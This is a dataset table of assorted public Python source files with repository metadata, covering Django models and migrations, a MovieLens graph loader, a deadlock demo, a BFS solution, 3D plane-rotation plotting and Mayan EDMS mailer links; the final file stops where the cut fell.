blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5ec1ee7bdb19d74f99bf937bc26b51227ed5e769 | 9c718b8964d476db4728fc0cf18e24292dd8cf60 | /MxOnline/apps/courses/migrations/0007_video_url.py | eb778b67fab3773e760b7adfb23e88345a338691 | [] | no_license | 1400720231/Django-Projects | 960f9226e0f5c01628afd65b9a78e810fdeb1b83 | 72f96788163f7ffe76e7599966ddbfa1d2199926 | refs/heads/master | 2021-06-25T17:41:14.147011 | 2019-04-03T02:24:38 | 2019-04-03T02:24:38 | 114,955,012 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.1 on 2018-02-20 18:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('courses', '0006_auto_20180220_1535'),
]
operations = [
migrations.AddField(
model_name='video',
name='url',
field=models.CharField(default='', max_length=200, verbose_name='访问地址'),
),
]
| [
"937886362@qq.com"
] | 937886362@qq.com |
87f111c9190d4f0e1168bed1af78f8024c31c36c | fd717fe6ca74f6d77210cdd57a8c365d27c5bfc6 | /pychron/database/records/power_map_record.py | 130d5dbfa486a1f9890af0689a7ca5fca6defcc4 | [
"Apache-2.0"
] | permissive | stephen-e-cox/pychron | 1dea0467d904d24c8a3dd22e5b720fbccec5c0ed | 681d5bfe2c13e514859479369c2bb20bdf5c19cb | refs/heads/master | 2021-01-19T15:40:03.663863 | 2016-07-14T14:37:16 | 2016-07-14T14:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,306 | py | # ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from traits.api import Bool, Instance, Enum, Range, on_trait_change, Any
from traitsui.api import HGroup, Group, Item, spring , VGroup
from pychron.database.records.sqlite_record import SQLiteRecord
# ============= standard library imports ========================
# import os
import csv
from pychron.managers.data_managers.h5_data_manager import H5DataManager
from pychron.graph.contour_graph import ContourGraph
# ============= local library imports ==========================
# def load_graph(self, graph=None, xoffset=0):
#
# if graph is None:
# graph = self._graph_factory(klass=TimeSeriesGraph)
# graph.new_plot(xtitle='Time',
# ytitle='Value',
# padding=[40, 10, 10, 40]
# )
#
# xi, yi = self._get_data()
# if xi is not None:
# graph.new_series(array(xi) + xoffset, yi)
#
# self.graph = graph
#
# return max(xi)
#
# def _get_data(self):
# dm = self._data_manager_factory()
# dm.open_data(self._get_path())
# xi = None
# yi = None
# if isinstance(dm, H5DataManager):
# s1 = dm.get_table('scan1', 'scans')
# if s1 is not None:
# xi, yi = zip(*[(r['time'], r['value']) for r in s1.iterrows()])
# else:
# self._loadable = False
# else:
# da = dm.read_data()
# if da is not None:
# xi, yi = da
# return xi, yi
class PowerMapRecord(SQLiteRecord):
title_str = 'PowerMap'
resizable = True
# graph3D = Instance(Graph3D, ())
graph3D = Any # Instance(Graph3D, ())
graph = Instance(ContourGraph)
vertical_ex = Range(1, 100)
surf = Bool(True)
surf_outline = Bool(True)
contour = Bool(False)
contour_outline = Bool(False)
levels = Range(4, 20)
representation = Enum('surface', 'wireframe', 'points')
def initialize(self):
self.load_graph()
return True
@on_trait_change('surf+, contour+,\
representation, levels,\
vertical_ex\
')
def refresh_graph3d(self):
self.graph3D.clear()
self.load_graph()
def traits_view(self):
twod_graph = Group(Item('graph',
show_label=False,
style='custom',
# height=1.0
),
label='2D'
)
# twod_graph = self._get_graph_item()
# twod_graph.label = '2D'
ctrl_grp = Group(
Item('vertical_ex', label='Vertical Ex.'),
HGroup(Item('contour'),
Item('levels'),
spring,
Item('contour_outline', label='Outline')
),
HGroup(Item('surf'),
Item('representation'),
spring,
Item('surf_outline', label='Outline')
),
show_border=True, label='Tweak')
threed_graph = Group(VGroup(
Item('graph3D', show_label=False,
style='custom'
),
ctrl_grp
),
label='3D',
)
# grps = VGroup(
grps = Group(
twod_graph,
threed_graph,
layout='tabbed'
)
# self._get_info_grp()
# )
# grps = twod_graph
return self._view_factory(grps)
def load_graph(self):
path = self.path
# path = os.path.join(self.root, self.filename)
from pychron.lasers.power.power_map_processor import PowerMapProcessor
pmp = PowerMapProcessor()
if path.endswith('.h5') or path.endswith('.hdf5'):
reader = H5DataManager()
# reader = self._data_manager_factory()
reader.open_data(path)
else:
with open(path, 'r') as f:
reader = csv.reader(f)
# trim off header
reader.next()
#
self.graph = pmp.load_graph(reader)
self.graph.width = 625
self.graph.height = 500
reader.open_data(path)
z, _ = pmp._extract_h5(reader)
if self.surf:
self.graph3D.plot_data(z, func='surf',
representation=self.representation,
warp_scale=self.vertical_ex ,
outline=self.surf_outline
)
if self.contour:
self.graph3D.plot_data(z, func='contour_surf',
contours=self.levels,
warp_scale=self.vertical_ex,
outline=self.contour_outline
)
def _graph3D_default(self):
from pychron.graph.graph3D import Graph3D
return Graph3D()
# def traits_view(self):
# v = View()
# return v
# ============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
ec707a98e97489c8d21cc1494e91807c9ccc0da2 | e8b0dcef3fda2cde71ff3a193af2524456783a24 | /examples/pytorch/recommendation/rec/datasets/movielens.py | 0caf1fece950170f7e74b2dfc79f859a0fcb7063 | [
"Apache-2.0"
] | permissive | Menooker/dgl | 79daba49407e2f113d61ba8fab0902c51993b060 | 170c2ed46fde29271246fe6600948b2864534ca3 | refs/heads/master | 2021-01-15T06:00:46.706097 | 2020-04-01T02:10:25 | 2020-04-01T02:10:25 | 242,896,301 | 3 | 0 | Apache-2.0 | 2020-02-25T03:01:25 | 2020-02-25T03:01:24 | null | UTF-8 | Python | false | false | 8,159 | py | import pandas as pd
import dgl
import os
import torch
import numpy as np
import scipy.sparse as sp
import time
from functools import partial
from .. import randomwalk
import stanfordnlp
import re
import tqdm
import string
class MovieLens(object):
def __init__(self, directory):
'''
directory: path to movielens directory which should have the three
files:
users.dat
movies.dat
ratings.dat
'''
self.directory = directory
users = []
movies = []
ratings = []
# read users
with open(os.path.join(directory, 'users.dat')) as f:
for l in f:
id_, gender, age, occupation, zip_ = l.strip().split('::')
users.append({
'id': int(id_),
'gender': gender,
'age': age,
'occupation': occupation,
'zip': zip_,
})
self.users = pd.DataFrame(users).set_index('id').astype('category')
# read movies
with open(os.path.join(directory, 'movies.dat'), encoding='latin1') as f:
for l in f:
id_, title, genres = l.strip().split('::')
genres_set = set(genres.split('|'))
# extract year
assert re.match(r'.*\([0-9]{4}\)$', title)
year = title[-5:-1]
title = title[:-6].strip()
data = {'id': int(id_), 'title': title, 'year': year}
for g in genres_set:
data[g] = True
movies.append(data)
self.movies = (
pd.DataFrame(movies)
.set_index('id')
.fillna(False)
.astype({'year': 'category'}))
self.genres = self.movies.columns[self.movies.dtypes == bool]
# read ratings
with open(os.path.join(directory, 'ratings.dat')) as f:
for l in f:
user_id, movie_id, rating, timestamp = [int(_) for _ in l.split('::')]
ratings.append({
'user_id': user_id,
'movie_id': movie_id,
'rating': rating,
'timestamp': timestamp,
})
ratings = pd.DataFrame(ratings)
movie_count = ratings['movie_id'].value_counts()
movie_count.name = 'movie_count'
ratings = ratings.join(movie_count, on='movie_id')
self.ratings = ratings
# drop users and movies which do not exist in ratings
self.users = self.users[self.users.index.isin(self.ratings['user_id'])]
self.movies = self.movies[self.movies.index.isin(self.ratings['movie_id'])]
self.data_split()
self.build_graph()
def split_user(self, df, filter_counts=False):
df_new = df.copy()
df_new['prob'] = 0
if filter_counts:
df_new_sub = (df_new['movie_count'] >= 10).nonzero()[0]
else:
df_new_sub = df_new['train'].nonzero()[0]
prob = np.linspace(0, 1, df_new_sub.shape[0], endpoint=False)
np.random.shuffle(prob)
df_new['prob'].iloc[df_new_sub] = prob
return df_new
def data_split(self):
self.ratings = self.ratings.groupby('user_id', group_keys=False).apply(
partial(self.split_user, filter_counts=True))
self.ratings['train'] = self.ratings['prob'] <= 0.8
self.ratings['valid'] = (self.ratings['prob'] > 0.8) & (self.ratings['prob'] <= 0.9)
self.ratings['test'] = self.ratings['prob'] > 0.9
self.ratings.drop(['prob'], axis=1, inplace=True)
def build_graph(self):
user_ids = list(self.users.index)
movie_ids = list(self.movies.index)
user_ids_invmap = {id_: i for i, id_ in enumerate(user_ids)}
movie_ids_invmap = {id_: i for i, id_ in enumerate(movie_ids)}
self.user_ids = user_ids
self.movie_ids = movie_ids
self.user_ids_invmap = user_ids_invmap
self.movie_ids_invmap = movie_ids_invmap
g = dgl.DGLGraph()
g.add_nodes(len(user_ids) + len(movie_ids))
# user features
for user_column in self.users.columns:
udata = torch.zeros(g.number_of_nodes(), dtype=torch.int64)
# 0 for padding
udata[:len(user_ids)] = \
torch.LongTensor(self.users[user_column].cat.codes.values.astype('int64') + 1)
g.ndata[user_column] = udata
# movie genre
movie_genres = torch.from_numpy(self.movies[self.genres].values.astype('float32'))
g.ndata['genre'] = torch.zeros(g.number_of_nodes(), len(self.genres))
g.ndata['genre'][len(user_ids):len(user_ids) + len(movie_ids)] = movie_genres
# movie year
g.ndata['year'] = torch.zeros(g.number_of_nodes(), dtype=torch.int64)
# 0 for padding
g.ndata['year'][len(user_ids):len(user_ids) + len(movie_ids)] = \
torch.LongTensor(self.movies['year'].cat.codes.values.astype('int64') + 1)
# movie title
nlp = stanfordnlp.Pipeline(use_gpu=False, processors='tokenize,lemma')
vocab = set()
title_words = []
for t in tqdm.tqdm(self.movies['title'].values):
doc = nlp(t)
words = set()
for s in doc.sentences:
words.update(w.lemma.lower() for w in s.words
if not re.fullmatch(r'['+string.punctuation+']+', w.lemma))
vocab.update(words)
title_words.append(words)
vocab = list(vocab)
vocab_invmap = {w: i for i, w in enumerate(vocab)}
# bag-of-words
g.ndata['title'] = torch.zeros(g.number_of_nodes(), len(vocab))
for i, tw in enumerate(tqdm.tqdm(title_words)):
g.ndata['title'][len(user_ids) + i, [vocab_invmap[w] for w in tw]] = 1
self.vocab = vocab
self.vocab_invmap = vocab_invmap
rating_user_vertices = [user_ids_invmap[id_] for id_ in self.ratings['user_id'].values]
rating_movie_vertices = [movie_ids_invmap[id_] + len(user_ids)
for id_ in self.ratings['movie_id'].values]
self.rating_user_vertices = rating_user_vertices
self.rating_movie_vertices = rating_movie_vertices
g.add_edges(
rating_user_vertices,
rating_movie_vertices,
data={'inv': torch.zeros(self.ratings.shape[0], dtype=torch.uint8)})
g.add_edges(
rating_movie_vertices,
rating_user_vertices,
data={'inv': torch.ones(self.ratings.shape[0], dtype=torch.uint8)})
self.g = g
def generate_mask(self):
while True:
ratings = self.ratings.groupby('user_id', group_keys=False).apply(self.split_user)
prior_prob = ratings['prob'].values
for i in range(5):
train_mask = (prior_prob >= 0.2 * i) & (prior_prob < 0.2 * (i + 1))
prior_mask = ~train_mask
train_mask &= ratings['train'].values
prior_mask &= ratings['train'].values
yield prior_mask, train_mask
def refresh_mask(self):
if not hasattr(self, 'masks'):
self.masks = self.generate_mask()
prior_mask, train_mask = next(self.masks)
valid_tensor = torch.from_numpy(self.ratings['valid'].values.astype('uint8'))
test_tensor = torch.from_numpy(self.ratings['test'].values.astype('uint8'))
train_tensor = torch.from_numpy(train_mask.astype('uint8'))
prior_tensor = torch.from_numpy(prior_mask.astype('uint8'))
edge_data = {
'prior': prior_tensor,
'valid': valid_tensor,
'test': test_tensor,
'train': train_tensor,
}
self.g.edges[self.rating_user_vertices, self.rating_movie_vertices].data.update(edge_data)
self.g.edges[self.rating_movie_vertices, self.rating_user_vertices].data.update(edge_data)
| [
"noreply@github.com"
] | Menooker.noreply@github.com |
74e2344e3bf94ca0eacd4283bbbeb33100bdf144 | 6caab8d886e8bd302d1994ff663cf5ccb5e11522 | /MyNotes_01/Step02/4-Concurrent/day03_09/demo12_dead_lock.py | 7cfadfec8a87614f6d0a798a678a98c857765851 | [] | no_license | ZimingGuo/MyNotes01 | 7698941223c79ee754b17296b9984b731858b238 | 55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6 | refs/heads/master | 2022-07-30T21:30:32.100042 | 2020-05-19T16:59:09 | 2020-05-19T16:59:09 | 265,254,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,758 | py | # author: Ziming Guo
# time: 2020/3/31
'''
demo_dead_lock:
'''
from time import sleep
from threading import Thread, Lock
# 交易类
class Account():
def __init__(self, _id, balance, lock): # 第三个参数的意思就是要初始化一个锁对象,方便之后上锁
# 创建了一个对象,就实例化了一个用户
self.id = _id # 用户
self.balance = balance # 存款
self.lock = lock # 锁
# 存钱
def withdraw(self, amount):
self.balance -= amount
# 取钱
def deposit(self, amount):
self.balance += amount
# 查看余额
def get_balance(self):
return self.balance
# 产生了两个账户
# 每个人都有自己的锁
Tom = Account('Tom', 5000, Lock())
Alex = Account('Alex', 8000, Lock())
# 模拟一个转账的过程
def transfer(from_, to, amount):
if from_.lock.acquire(): # 先让这个拿出钱的人上锁
from_.withdraw(amount) # 上锁之后,再让这个拿出钱的人,的账户的钱减少
sleep(0.5)
if to.lock.acquire(): # 然后在锁住对方的账户,也就是收钱的人的账户
to.deposit(amount) # 锁住对方的账户之后,就给对方的这个账户加钱
to.lock.release() # 然后再给这个账户解锁
from_.lock.release() # 拿钱的这个账户解锁
print("%s 给 %s 转账 %d" % (from_.id, to.id, amount))
# 单独的以此转账
transfer(Tom, Alex, 4000)
t1 = Thread(target=transfer, args=(Tom, Alex, 2000))
t2 = Thread(target=transfer, args=(Alex, Tom, 3500))
# 一个特殊情况:Tom 正在给 Alex 转钱,与此同时,Alex 也在给 Tom 转钱
# 此时就会产生死锁
t1.start()
t2.start()
t1.join()
t2.join()
| [
"guoziming99999@icloud.com"
] | guoziming99999@icloud.com |
fac612177f53a4d7c75a80e5625418495ff1526b | 1f813c3cd6a9d293acfbc81f198c64f816a9a95d | /build/gazebo_msgs/catkin_generated/generate_cached_setup.py | fb96ff1529bff413e751a55b32cc355d9b1ca061 | [] | no_license | koteshrv/Vargi_Bots_1418 | 5ada79746785a9f9cc0e1d686a1dd2702c9e0f0f | 6bcf843c7150c93caee2b596e0864749c51b6155 | refs/heads/main | 2023-01-06T03:42:53.555701 | 2020-11-08T17:36:59 | 2020-11-08T17:36:59 | 302,916,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,322 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/kotesh/catkin_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/kotesh/catkin_ws/devel/.private/gazebo_msgs/env.sh')
output_filename = '/home/kotesh/catkin_ws/build/gazebo_msgs/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"kkotesh100@gmail.com"
] | kkotesh100@gmail.com |
0da03225afbcf284ba55cf1f6e0ac7ec5f9eef7e | 7933d55de7e2d3a9e78a372fa76f064f5ed5eb6f | /maths/solutions_printing.py | c9eb70fbad5598e1f5f8b71bc4e0ae58c60e772c | [] | no_license | o2edu/MathsExams | 4921f6683e1d6d96aa834d5b01f30bd66522887d | 8e2c0aeba6bbad52103c420747ead1dad6380408 | refs/heads/master | 2021-05-29T17:42:32.442055 | 2014-05-31T10:18:12 | 2014-05-31T10:18:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 439 | py | import sympy
def substitute(expr, var, value):
latex = sympy.latex(expr)
print(latex)
latex = latex.replace(sympy.latex(var), sympy.latex(value))
return latex
def integral_working(expr, var, l, h):
left = substitute(expr, var, h) # upper bound goes on the left
right = substitute(expr, var, l) # lower bound goes on the right
return '\left(' + left + r'\right)' + ' - ' + '\left(' + right + r'\right)'
| [
"ben.lucato@gmail.com"
] | ben.lucato@gmail.com |
de58538e32e4fab5da02e44f5307d9f8381e1187 | 2fa05752244c2ab39c108c11ab2dc22f4f9e9ad0 | /Events/models.py | 21a3d293241fbf3a2f10e964028a4f94d626d2d1 | [
"Apache-2.0"
] | permissive | CiganOliviu/cigan_enterprize | b88aebcb27ec97dd229e67cbb5bea3199cc8b5ce | 8a4f4c06197655622ca08f92ec793add7d0be0cd | refs/heads/main | 2023-03-04T05:28:11.376109 | 2021-02-14T20:38:29 | 2021-02-14T20:38:29 | 333,212,689 | 0 | 0 | Apache-2.0 | 2021-02-14T20:38:29 | 2021-01-26T20:45:44 | null | UTF-8 | Python | false | false | 2,284 | py | from django.db import models
class PastEvent(models.Model):
event_name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
space = models.CharField(max_length=200)
part_of_event = models.CharField(max_length=200, blank=True)
introduction = models.CharField(max_length=300, default="")
about_event = models.TextField(default="")
get_tickets = models.URLField(max_length=200)
cover_image = models.ImageField(upload_to='events/cover/', default='default.jpg')
location_image = models.ImageField(upload_to='events/location/', default='default.jpg')
date = models.DateTimeField()
past_event_slug = models.SlugField(max_length=200, unique=True, default="")
def __str__(self):
return self.event_name
class SponsorEvent(models.Model):
event_name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
space = models.CharField(max_length=200)
part_of_event = models.CharField(max_length=200, blank=True)
introduction = models.CharField(max_length=300, default="")
about_event = models.TextField(default="")
get_tickets = models.URLField(max_length=200)
cover_image = models.ImageField(upload_to='events/cover/', default='default.jpg')
location_image = models.ImageField(upload_to='events/location/', default='default.jpg')
date = models.DateTimeField()
event_slug = models.SlugField(max_length=200, unique=True, default="")
def __str__(self):
return self.event_name
class HostEvent(models.Model):
event_name = models.CharField(max_length=200)
location = models.CharField(max_length=200)
space = models.CharField(max_length=200)
part_of_event = models.CharField(max_length=200, blank=True)
introduction = models.CharField(max_length=300, default="")
about_event = models.TextField(default="")
get_tickets = models.URLField(max_length=200)
cover_image = models.ImageField(upload_to='events/cover/', default='default.jpg')
location_image = models.ImageField(upload_to='events/location/', default='default.jpg')
date = models.DateTimeField()
event_slug = models.SlugField(max_length=200, unique=True, default="")
def __str__(self):
return self.event_name
| [
"ciganoliviudavid@gmail.com"
] | ciganoliviudavid@gmail.com |
7681fbbf18fcd73148a18090ee3dc623e67524c3 | 999f3f3da1cb70cb5872f99a09d65d7c4df71cf7 | /src/data/422.py | c9f4348a402a94ccc58fe6c9159dfcb7a2658c86 | [
"MIT"
] | permissive | NULLCT/LOMC | 0f0d1f01cce1d5633e239d411565ac7f0c687955 | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | refs/heads/main | 2023-07-27T17:03:46.703022 | 2021-09-04T08:58:45 | 2021-09-04T08:58:45 | 396,290,713 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,147 | py | import sys
def input():
return sys.stdin.readline().rstrip()
from collections import deque
n, q = map(int, input().split()) # 頂点数と辺数
# グラフ入力受け取り (ここでは無向グラフを想定)
graph = [[] for _ in range(n)]
for i in range(n - 1):
a, b = map(int, input().split())
a -= 1
b -= 1
graph[a].append(b)
graph[b].append(a)
dist = [-1] * n # 全頂点を -1 (未訪問) に初期化
pos = deque() # キュー
# 初期条件 (頂点 0 を始点とする)
dist[0] = 0
pos.append(0)
# 幅優先探索 (キューが空になるまで探索を行う)
while len(pos) > 0:
v = pos.popleft() # キューから先頭の頂点を取り出す
for nv in graph[v]:
# 既に訪問済みの頂点は探索しない
if dist[nv] != -1:
continue
# 新たな頂点 nv について距離情報を更新してキューに追加する
dist[nv] = dist[v] + 1
pos.append(nv)
for i in range(q):
c, d = map(int, input().split())
c -= 1
d -= 1
if (dist[c] + dist[d]) % 2 == 0:
print("Town")
else:
print("Road")
| [
"cockatiel.u10@gmail.com"
] | cockatiel.u10@gmail.com |
b7cd2b10ebf6dfaa8b82fd393ae5c7eb222e452b | e76017111250067edf5fb563cf2e483badc68ece | /chap2/transforms.py | ca28ed1d6cdeb350b8ffd3b54badf1f87a155ea3 | [] | no_license | jaringson/Flight_Dynamics | f64108ec816e9606bcdddb0b5814992182e8b3ed | abaf667e154e9005c5160c68cdcb48a882e0c48e | refs/heads/master | 2021-05-11T16:03:45.597431 | 2018-04-13T20:53:28 | 2018-04-13T20:53:28 | 117,749,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,802 | py |
from numpy import pi, sin
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# import matplotlib.animation as animation
from matplotlib.widgets import Slider
def draw_plane_nwu(plane_in):
R = np.array([[1,0,0],
[0,-1,0],
[0,0,-1]])
p = R.dot(plane_in)
return p[0,:], p[1,:], p[2,:]
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# Adjust the subplots region to leave some space for the sliders and buttons
fig.subplots_adjust(bottom=0.25)
t = np.arange(0.0, 1.0, 0.001)
azim_0 = 0
ele_0 = 0
tilt_0 = 0
# plane in ned
plane = np.array([[0,0,0],
[0.5,0,0],
[0.1,0,0],
[0,0.5,-0.1], #left wing
[0.1,0,0],
[0,-0.5,-0.1], #right wing
[0.1,0,0],
[-0.5,0,0],
[-0.5,0,-0.25],
[-0.5,0.1,-0.25],
[-0.5,-0.1,-0.25]]).T
# Draw the initial plot
# The 'line' variable is used for modifying the line later
[line] = ax.plot(*draw_plane_nwu(np.array([[-1,0,0],[0,-1,0],[0,0,1]]).dot(plane)), linewidth=2, color='red')
# [line2] = ax.plot(*draw_plane_nwu(np.array([[-1,0,0],[0,-1,0],[0,0,1]]).dot(plane)), linewidth=2, color='blue')
ax.set_xlim([-1, 1])
ax.set_ylim([-1, 1])
ax.set_zlim([-1, 1])
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
# Define an axes area and draw a slider in it
azim_slider_ax = fig.add_axes([0.15, 0.15, 0.7, 0.03], axisbg='white')
azim_slider = Slider(azim_slider_ax, 'Azim', -180.0, 180.0, valinit=azim_0)
# Draw another slider
ele_slider_ax = fig.add_axes([0.325, 0.1, 0.35, 0.03], axisbg='white')
ele_slider = Slider(ele_slider_ax, 'Elev', -90.0, 90.0, valinit=ele_0)
# Draw another slider
tilt_slider_ax = fig.add_axes([0.15, 0.05, 0.7, 0.03], axisbg='white')
tilt_slider = Slider(tilt_slider_ax, 'Tilt', -180.0, 180.0, valinit=tilt_0)
# Define an action for modifying the line when any slider's value changes
def sliders_on_changed(val):
azim = np.radians(azim_slider.val)
ele = np.radians(ele_slider.val)
tilt = np.radians(tilt_slider.val)
Rt = np.array([[1,0,0],
[0,np.cos(-tilt),-np.sin(-tilt)],
[0,np.sin(-tilt),np.cos(-tilt)]])
Re = np.array([[np.cos(-ele),0,np.sin(-ele)],
[0,1,0],
[-np.sin(-ele),0,np.cos(-ele)]])
Ra = np.array([[np.cos(azim),-np.sin(azim),0],
[np.sin(azim),np.cos(azim),0],
[0,0,1]])
Rrev = np.array([[-1,0,0], # rotates the plane to face you instead of away from you
[0,-1,0],
[0,0,1]])
R = Rrev.dot(Rt).dot(Re).dot(Ra)
global line
line.remove()
[line] = ax.plot(*draw_plane_nwu(R.dot(plane)), linewidth=2, color='red')
# now assuming Z_1*Y_2*X_3
pitch = -np.arcsin(R[2,0])
roll = np.arctan2(R[2,1],R[2,2])
yaw = np.arctan2(R[1,0],R[0,0])
print 'yaw', np.degrees(yaw), 'pitch', np.degrees(pitch), 'roll',np.degrees(roll)
# Rr = np.array([[1,0,0],
# [0,np.cos(roll),-np.sin(roll)],
# [0,np.sin(roll),np.cos(roll)]])
# Rp = np.array([[np.cos(pitch),0,np.sin(pitch)],
# [0,1,0],
# [-np.sin(pitch),0,np.cos(pitch)]])
# Ry = np.array([[np.cos(yaw),-np.sin(yaw),0],
# [np.sin(yaw),np.cos(yaw),0],
# [0,0,1]])
# R = Ry.dot(Rp).dot(Rr)
# global line2
# line2.remove()
# [line2] = ax.plot(*draw_plane_nwu(R.dot(plane)), linewidth=2, color='blue')
fig.canvas.draw_idle()
azim_slider.on_changed(sliders_on_changed)
ele_slider.on_changed(sliders_on_changed)
tilt_slider.on_changed(sliders_on_changed)
plt.show()
| [
"jaringson@gmail.com"
] | jaringson@gmail.com |
840c7e4b607bbbfba8780d7200c113b9d8d33362 | 95e8ff5910648df82a1d6dd538b535142be96162 | /SnakeGame/Map.py | 3583ecf10a0df739986225f8835032f30dc5e52d | [] | no_license | visittor/RL | 862d60821a8a52a532ce8ec742e67ef79c772545 | d110e070f9dd0b78cd61281774c567513aa984e2 | refs/heads/master | 2021-07-02T19:24:14.521192 | 2020-10-31T14:42:02 | 2020-10-31T14:42:02 | 221,648,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py |
class Map( object ):
def __init__( self, width: int, height: int ):
self.__width = width
self.__height = height
@property
def width( self ):
return self.__width
@property
def height( self ):
return self.__height | [
"chattarin.rodpon@gmail.com"
] | chattarin.rodpon@gmail.com |
7d298047fa3855b4c60842492f353cf8185c2917 | 94872a7ee1f7cd64a59e59c2092b18f48954d9eb | /IlijaCollector/cleanup.py | cdfbbc2987a069c52d943697dadd948707fcac53 | [] | no_license | ivukotic/FAXtools | 106957227a7033c6eaaeca29e30f859307c7ebbb | 0b9068f0b82f03c5422f7f66615e9d4083d77388 | refs/heads/master | 2020-04-06T03:33:51.797364 | 2016-11-16T16:45:05 | 2016-11-16T16:45:05 | 6,708,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | #!/usr/bin/python
from datetime import datetime
import xml.etree.ElementTree as ET
@outputSchema("CLEANED:tuple(SRC:chararray,SITE:chararray,TOS:long,TOD:long,TOE:long,IN:long,OUT:long)")
def XMLtoNTUP(xmlInput):
ntup = []
root = ET.fromstring(xmlInput)
SRC=root.attrib['src'] # server name
SITE=root.attrib['site'] # sitename as set by the endpoint
TOS=root.attrib['tos'] # time the service started
# PID=long(root.attrib['pid']) # PID of the serving process
TOD=root.attrib['tod'] # time the statistics gathering started
for child in root:
print child.tag, child.attrib
if child.attrib['id']=='link':
for c in child:
if c.tag=='in': IN=long(c.text)
if c.tag=='out': OUT=long(c.text)
if child.attrib['id']=='sgen':
for c in child:
if c.tag=='toe': TOE=long(c.text)
return (SRC,SITE,TOS,TOD,TOE,IN,OUT)
| [
"ivukotic@cern.ch"
] | ivukotic@cern.ch |
bf1e5321014ae815ae54a903c7dbd9492dc21a4b | 628ec414b7807fc50de67345361e41cc68ba3720 | /mayan/apps/mailer/links.py | ff70be2f8437a595c00305f37b45fb2a84c475bf | [
"Apache-2.0"
] | permissive | TestingCodeReview/Mayan-EDMS | aafe144424ffa8128a4ff7cee24d91bf1e1f2750 | d493ec34b2f93244e32e1a2a4e6cda4501d3cf4e | refs/heads/master | 2020-05-27T23:34:44.118503 | 2019-04-05T02:04:18 | 2019-04-05T02:04:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,503 | py | from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Link
from .icons import (
icon_system_mailer_error_log, icon_user_mailer_create,
icon_user_mailer_list, icon_user_mailer_setup
)
from .permissions import (
permission_mailing_link, permission_mailing_send_document,
permission_user_mailer_create, permission_user_mailer_delete,
permission_user_mailer_edit, permission_user_mailer_use,
permission_user_mailer_view, permission_view_error_log
)
link_send_document = Link(
args='resolved_object.pk', permissions=(permission_mailing_send_document,),
text=_('Email document'), view='mailer:send_document'
)
link_send_document_link = Link(
args='resolved_object.pk', permissions=(permission_mailing_link,),
text=_('Email link'), view='mailer:send_document_link'
)
link_send_multiple_document = Link(
text=_('Email document'), view='mailer:send_multiple_document'
)
link_send_multiple_document_link = Link(
text=_('Email link'), view='mailer:send_multiple_document_link'
)
link_system_mailer_error_log = Link(
icon_class=icon_system_mailer_error_log,
permissions=(permission_view_error_log,),
